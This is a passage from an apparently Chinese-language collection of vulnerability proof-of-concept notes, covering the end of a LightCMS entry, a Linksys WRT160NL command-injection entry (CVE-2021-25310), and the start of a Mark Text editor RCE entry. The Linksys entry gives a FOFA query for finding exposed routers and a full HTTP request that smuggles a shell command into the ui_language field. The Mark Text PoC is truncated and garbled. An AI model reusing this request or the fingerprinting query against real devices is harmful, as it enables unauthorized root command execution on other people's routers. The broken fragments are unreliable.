13 | * 3.访问/admin/SensitiveWords触发。
14 |
15 | PoC:
16 |
17 |
18 | ```
19 | 
20 | ```
21 |
22 | ref:
23 |
24 | * https://nvd.nist.gov/vuln/detail/CVE-2021-3355
25 | * https://github.com/eddy8/LightCMS/issues/18
--------------------------------------------------------------------------------
/Linksys WRT160NL 身份验证命令注入(CVE-2021-25310).md:
--------------------------------------------------------------------------------
1 | # Linksys WRT160NL 身份验证命令注入(CVE-2021-25310)
2 |
3 | FOFA:
4 |
5 | ```
6 | app="LINKSYS-WRT160NL"
7 | ```
8 |
9 | 成功利用此漏洞可能导致在受影响的设备上远程执行代码。
10 |
11 | 管理Web面板允许用户更改UI语言,以将POST请求发送到apply.cgi。该参数在内部作为系统命令中文件系统路径的一部分。缺少输出编码和输入验证,使经过身份验证的攻击者能够注入将以root特权执行系统命令。
12 |
13 | PoC:
14 |
15 | ```bash
16 | POST /apply.cgi;session_id=8e780f3bcc71e19a37cc3e60a5576241 HTTP/1.1
17 | Host: 192.168.1.150
18 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
19 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
20 | Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
21 | Accept-Encoding: gzip, deflate
22 | Content-Type: application/x-www-form-urlencoded
23 | Content-Length: 854
24 | Origin: http://192.168.1.150
25 | Connection: close
26 | Referer: http://192.168.1.150/index.asp;session_id=8e780f3bcc71e19a37cc3e60a5576241
27 | Upgrade-Insecure-Requests: 1
28 |
29 | pptp_dhcp=0&(...)&ui_language=es||ls>/tmp/b||&(...)
30 | ```
31 |
32 | ref:
33 |
34 | * https://research.nccgroup.com/2021/01/28/technical-advisory-linksys-wrt160nl-authenticated-command-injection-cve-2021-25310/
35 | * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25310
36 | * https://forum.ywhack.com/thread-115065-1-1.html
--------------------------------------------------------------------------------
/Mark Text Markdown 编辑器RCE(CVE-2021-29996).md:
--------------------------------------------------------------------------------
1 | # Mark Text Markdown 编辑器RCE(CVE-2021-29996)
2 |
3 | Mark Text 0.16.3可以使攻击者任意执行命令。通过打开包含变异跨站脚本(XSS)Payload的.md文件,这可能导致远程执行代码(RCE)。
4 |
5 | PoC:
6 |
7 | ```
21 |
24 |
25 |
26 | Æ
27 |
28 |